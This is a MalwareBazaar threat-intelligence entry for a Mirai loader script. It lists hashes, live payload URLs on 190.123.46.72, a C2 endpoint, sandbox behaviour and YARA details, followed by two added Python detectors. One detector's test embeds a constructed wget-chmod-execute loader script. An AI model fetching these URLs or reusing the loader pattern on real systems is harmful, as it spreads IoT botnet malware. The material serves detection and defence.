MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 a08bbfe1428ccff19c582fdfb0d55ee2bc262caf59048a50dc0da5bf21a00d91. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Mirai
Vendor detections: 6

SHA256 hash: a08bbfe1428ccff19c582fdfb0d55ee2bc262caf59048a50dc0da5bf21a00d91
SHA3-384 hash: 2e34f91355741507ac949961f22af0baed3670988b2d0e088ad38996eec136eaf20688988dede1a9d3449a12fb52b194
SHA1 hash: 1a29c3c58dae3bce7bb943e31e7ca09339898d20
MD5 hash: df3f0c5380a52d6313b634a2e741cc45
humanhash: maryland-victor-north-summer
File name: wget.sh
Signature: Mirai
File size: 935 bytes
First seen: 2025-12-25 09:58:18 UTC
Last seen: 2025-12-25 22:41:12 UTC
File type: sh
MIME type: text/plain
ssdeep: 12:Gw3XHNIBS+CoKSrVxHX+MYl9AXY9o3TxykF66hyrQkn:GSHNIIKKSrL3zYl9AI9WhdOQkn
TLSH: T1EB119ED921905C3948EACC0D32E58808963BD58979619F2DDEFD442B40E7AB87F6CE8D
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
URL | Malware sample (SHA256 hash) | Signature | Tags
http://190.123.46.72/bins/main_arm | 0b423d1b9e7a9e6719bf77dfa5363998d04f9edad2ee8e2de911c7ae995a391a | Mirai | elf mirai ua-wget
http://190.123.46.72/bins/main_arm5 | 5d94992dac0b6d592f86b0d59af84c52168f05d7aa1713a0c4fd62820be71630 | Mirai | elf mirai ua-wget
http://190.123.46.72/bins/main_arm6 | 5b1cf87888710837c0007fd20877644abec191d7fed82763a15b959d591444d4 | Mirai | elf mirai ua-wget
http://190.123.46.72/bins/main_arm7 | cf40305398ee234528ebd18bb54b13e1bb94f90a501636857e25ba114bb1c9c6 | Mirai | elf mirai ua-wget
http://190.123.46.72/bins/main_sh4 | fd893a3ee002cd623137b4f65fda5624232eb22e53f5fec40601bc26e7eed29a | Mirai | elf mirai ua-wget
http://190.123.46.72/bins/main_m68k | 7cca33815eaccd864db722658cce4a234c32280e2ee7266c9fecd8601652c95f | Mirai | elf mirai ua-wget
http://190.123.46.72/bins/main_mips | 261cbea15e9c316a7a13d6ee7c496feb4364d264355821dc03664c17f398bcd1 | Mirai | elf mirai ua-wget
http://190.123.46.72/bins/main_mpsl | 2322a5098627d113e939e6ac7ddb5c80ed5e253a650c6b6e1737baa4617db415 | Mirai | elf mirai ua-wget
http://190.123.46.72/bins/main_x86_64 | 6c22bec08f6ce62b43664b22028e033d496990b06a053c4aee5168b3af787c55 | Mirai | elf mirai ua-wget
http://190.123.46.72/bins/main_ppc | b1d611c59c43c5f2ae26da403ac6f4c59f721d91716cd5c07e3293351db8124c | Mirai | elf mirai ua-wget
http://190.123.46.72/bins/main_x86 | 05466e5727f528209cff95c2e7e2b197aa0fe4e312fd3709c13a1605c8cc2555 | Mirai | elf mirai ua-wget

Intelligence

File Origin
# of uploads: 2
# of downloads: 33
Origin country: DE

Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: bash lolbin mirai
Status: terminated
Behavior Graph:
The graph (process tree plus network activity; the original page renders it as a diagram) reduces to:

- pid 2445 /usr/bin/sudo --execve--> pid 2451 /tmp/sample.bin (the script under analysis)
- pid 2451 runs /usr/bin/wget eleven times (pids 2453, 2543, 2666, 2766, 2876, 2954, 3068, 3183, 3244, 3290, 3366; each flagged dns, net, send-data, write-file), /usr/bin/chmod eleven times (pids 2539, 2660, 2761, 2870, 2951, 3063, 3178, 3241, 3287, 3363, 3441) and clones /usr/bin/dash nine times (pids 2540, 2662, 2762, 2872, 2952, 3065, 3180, 3242, 3364)
- every wget sends 88 B to 10.0.2.3:53 (DNS) and 141 to 144 B to 190.123.46.72:80 (HTTP)
- pid 2451 --execve--> pid 3288 /home/sandbox/main_x86_64 (delete-file, net): connects to 8.8.8.8:53 and clones pid 3289 (dns, net, send-data, zombie), which sends 33 B to 8.8.8.8:53 and 11 B to chmod0777kk.com:1995, then clones pid 3291
- pid 2451 --execve--> pid 3443 /home/sandbox/main_x86 (delete-file, net): same pattern via clone pid 3444 (33 B to 8.8.8.8:53, 11 B to chmod0777kk.com:1995), which clones pid 3446
- pid 2451 --execve--> pid 3445 /usr/bin/rm (delete-file)
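The process tree above, turned into detection logic. This is an added example, not code from MalwareBazaar or from the sample: EVENTS is constructed telemetry whose pids, paths and endpoints are taken from the behaviour graph, while the (event, pid, ppid, detail) schema, the BENIGN_EVENTS control and the rule in detect_loader_chain are this example's own assumptions.

```python
"""Behavioural detection of the download -> chmod -> execute -> delete loader chain.

Added example; neither MalwareBazaar's code nor the sample's. EVENTS is
constructed telemetry modelled on the behaviour graph above (pids, paths and
endpoints come from it); the event schema and the rule are assumptions here.
"""
import ipaddress
from collections import defaultdict

SYSTEM_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/lib/", "/lib64/")
DOWNLOADERS = {"/usr/bin/wget", "/bin/wget", "/usr/bin/curl", "/bin/curl", "/usr/bin/tftp"}
STANDARD_PORTS = {53, 80, 443}

# Constructed events (event, pid, ppid, detail); "fork" stands for the graph's clone edges.
EVENTS = [
    ("exec",    2451, 2445, "/tmp/sample.bin"),            # the script, launched via sudo
    ("exec",    2453, 2451, "/usr/bin/wget"),
    ("connect", 2453, 2451, "10.0.2.3:53"),
    ("connect", 2453, 2451, "190.123.46.72:80"),
    ("exec",    2539, 2451, "/usr/bin/chmod"),
    ("exec",    3244, 2451, "/usr/bin/wget"),
    ("connect", 3244, 2451, "190.123.46.72:80"),
    ("exec",    3287, 2451, "/usr/bin/chmod"),
    ("exec",    3288, 2451, "/home/sandbox/main_x86_64"),  # downloaded payload runs
    ("fork",    3289, 3288, "/home/sandbox/main_x86_64"),
    ("connect", 3289, 3288, "8.8.8.8:53"),
    ("connect", 3289, 3288, "chmod0777kk.com:1995"),       # non-standard port
    ("exec",    3441, 2451, "/usr/bin/chmod"),
    ("exec",    3443, 2451, "/home/sandbox/main_x86"),
    ("fork",    3444, 3443, "/home/sandbox/main_x86"),
    ("connect", 3444, 3443, "chmod0777kk.com:1995"),
    ("exec",    3445, 2451, "/usr/bin/rm"),                # cleanup
]
# Constructed control: an admin shell fetching over TLS from a hostname, then dpkg.
BENIGN_EVENTS = [
    ("exec",    100, 1,   "/bin/bash"),
    ("exec",    101, 100, "/usr/bin/wget"),
    ("connect", 101, 100, "deb.debian.org:443"),
    ("exec",    102, 100, "/usr/bin/chmod"),
    ("exec",    103, 100, "/usr/bin/dpkg"),
]


def _split(endpoint):
    host, port = endpoint.rsplit(":", 1)
    return host, int(port)


def _literal_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def detect_loader_chain(events):
    """Return {parent_pid: finding} for each parent that, in order, spawned a
    downloader reaching a literal-IP host, then chmod, then executed a file
    outside system paths. Also records connections to non-standard ports made
    by that payload or its direct children, and a later rm (cleanup)."""
    execs = defaultdict(list)     # ppid -> [(idx, pid, path)] in event order
    tree = defaultdict(list)      # ppid -> [pid] for exec and fork
    connects = defaultdict(list)  # pid -> [(host, port)]
    path_of = {}
    for idx, (ev, pid, ppid, detail) in enumerate(events):
        if ev in ("exec", "fork"):
            tree[ppid].append(pid)
            path_of.setdefault(pid, detail)
        if ev == "exec":
            execs[ppid].append((idx, pid, detail))
        elif ev == "connect":
            connects[pid].append(_split(detail))

    def ip_fetches(pid):  # literal-IP hosts a downloader contacted, DNS excluded
        return [h for h, p in connects[pid] if p != 53 and _literal_ip(h)]

    findings = {}
    for parent, children in execs.items():
        downloads = [(i, p) for i, p, path in children if path in DOWNLOADERS and ip_fetches(p)]
        if not downloads:
            continue
        chmods = [i for i, _, path in children if path.endswith("/chmod") and i > downloads[0][0]]
        if not chmods:
            continue
        payloads = [(i, p, path) for i, p, path in children
                    if i > chmods[0] and not path.startswith(SYSTEM_PREFIXES)]
        if not payloads:
            continue
        c2 = {f"{h}:{p}" for _, pid, _ in payloads for q in [pid, *tree.get(pid, ())]
              for h, p in connects[q] if p not in STANDARD_PORTS}
        findings[parent] = {
            "loader": path_of.get(parent, "?"),
            "downloads": len(downloads),
            "download_hosts": sorted({h for _, p in downloads for h in ip_fetches(p)}),
            "payloads": [path for _, _, path in payloads],
            "c2_endpoints": sorted(c2),
            "cleanup": any(path.endswith("/rm") and i > payloads[0][0] for i, _, path in children),
        }
    return findings
```

Run against EVENTS the rule flags pid 2451 (/tmp/sample.bin) with 190.123.46.72 as the download host, the two /home/sandbox payloads, chmod0777kk.com:1995 as the only non-standard-port endpoint and the trailing rm; the hostname-based BENIGN_EVENTS control yields nothing. The port-53 traffic to 10.0.2.3 and 8.8.8.8 is deliberately ignored as resolver noise, and the C2 lookup only follows one fork level because that is all the graph shows.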
Threat name: Document-HTML.Downloader.Heuristic
Status: Malicious
First seen: 2025-12-25 09:49:28 UTC
File Type: Text (Shell)
AV detection: 13 of 24 (54.17%)
Threat level: 2/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh
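The technique the rule description lists (download from a literal IP, chmod, execute payloads named for several architectures), carried out as Python detection logic. This is an added example; it is not the YARA rule itself and not MalwareBazaar's code. Both scripts it scans are constructed for the test: LOADER_SCRIPT imitates the download/chmod/execute/remove pattern the behaviour graph documents but uses a TEST-NET address and is not the content of wget.sh; BENIGN_SCRIPT is a control.

```python
"""Static heuristic for multi-architecture IoT loader shell scripts.

Added example re-implementing, in Python, the technique the YARA rule's
description lists (download from a literal IP, chmod, execute several
architecture-named payloads). It is not that rule and not MalwareBazaar's
code; LOADER_SCRIPT is constructed for the test with a TEST-NET address and
is not the content of wget.sh.
"""
import ipaddress
import re

URL_RE = re.compile(r"(?:https?|tftp|ftp)://([^/\s:]+)(?::\d+)?(/[^\s;&|]*)?")
DOWNLOADER_RE = re.compile(r"\b(?:busybox\s+)?(?:wget|curl|tftp|ftpget)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(?:-\w+\s+)*(?:[ugoa]*\+[rwxst]+|[0-7]{3,4})\b")
EXEC_RE = re.compile(r"(?:^|[;&|])\s*\./([^\s;&|]+)", re.M)
RM_RE = re.compile(r"\brm\s+(?:-\w+\s+)*\S+")
ARCH_RE = re.compile(
    r"(?<![a-z0-9])(arm[4-7]?|aarch64|mips(?:el)?|mpsl|x86(?:_64)?|x64|i[3-6]86|"
    r"sh4|m68k|ppc|spc|arc)(?![a-z0-9])", re.I)


def _literal_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyse_script(text):
    """Collect loader evidence from a shell script and derive a verdict."""
    hosts, paths, archs = set(), [], set()
    for line in text.splitlines():
        if not DOWNLOADER_RE.search(line):
            continue
        for host, path in URL_RE.findall(line):
            if _literal_ip(host):          # numeric-IP distribution host
                hosts.add(host)
                paths.append(path or "/")
                archs.update(a.lower() for a in ARCH_RE.findall(path))
    executed = EXEC_RE.findall(text)       # ./name invocations
    archs.update(a.lower() for name in executed for a in ARCH_RE.findall(name))
    chmod_count = len(CHMOD_RE.findall(text))
    evidence = {
        "download_hosts": sorted(hosts),
        "downloaded_paths": paths,
        "executed": executed,
        "architectures": sorted(archs),
        "chmod_count": chmod_count,
        "cleanup": bool(RM_RE.search(text)),
    }
    # Verdict mirrors the rule's description: literal-IP download, chmod, execution,
    # and payloads named for at least two CPU architectures.
    evidence["verdict"] = bool(hosts) and chmod_count > 0 and bool(executed) and len(archs) >= 2
    return evidence


# Constructed loader script in the style the behaviour graph documents (TEST-NET
# address, not the real distribution host; this is not the content of wget.sh).
LOADER_SCRIPT = """#!/bin/sh
wget http://192.0.2.10/bins/main_arm7 -O main_arm7; chmod 777 main_arm7; ./main_arm7; rm -rf main_arm7
wget http://192.0.2.10/bins/main_mips -O main_mips; chmod 777 main_mips; ./main_mips; rm -rf main_mips
wget http://192.0.2.10/bins/main_mpsl -O main_mpsl; chmod 777 main_mpsl; ./main_mpsl; rm -rf main_mpsl
wget http://192.0.2.10/bins/main_x86_64 -O main_x86_64; chmod 777 main_x86_64; ./main_x86_64; rm -rf main_x86_64
"""

# Constructed control: hostname download with a signature check, single architecture.
BENIGN_SCRIPT = """#!/bin/sh
set -e
curl -fsSL https://example.org/releases/tool-1.2.tar.gz -o /tmp/tool.tar.gz
gpg --verify /tmp/tool.tar.gz.sig /tmp/tool.tar.gz
tar -xzf /tmp/tool.tar.gz && chmod +x ./tool/install.sh && ./tool/install.sh
"""
```

analyse_script(LOADER_SCRIPT) returns a positive verdict with 192.0.2.10 as the only host and arm7, mips, mpsl and x86_64 as the architectures; the control script also downloads, chmods and executes, but from a hostname and for one target, so it stays negative. The architecture alternation is the part worth tuning for a real deployment: the per-arch names on this page (main_arm through main_x86) all fit it, but a loader that renames its payloads will only be caught by the download/chmod/execute structure.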

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Signature: Mirai
File type: sh
SHA256 hash: a08bbfe1428ccff19c582fdfb0d55ee2bc262caf59048a50dc0da5bf21a00d91 (this sample)

Delivery method: Distributed via web download
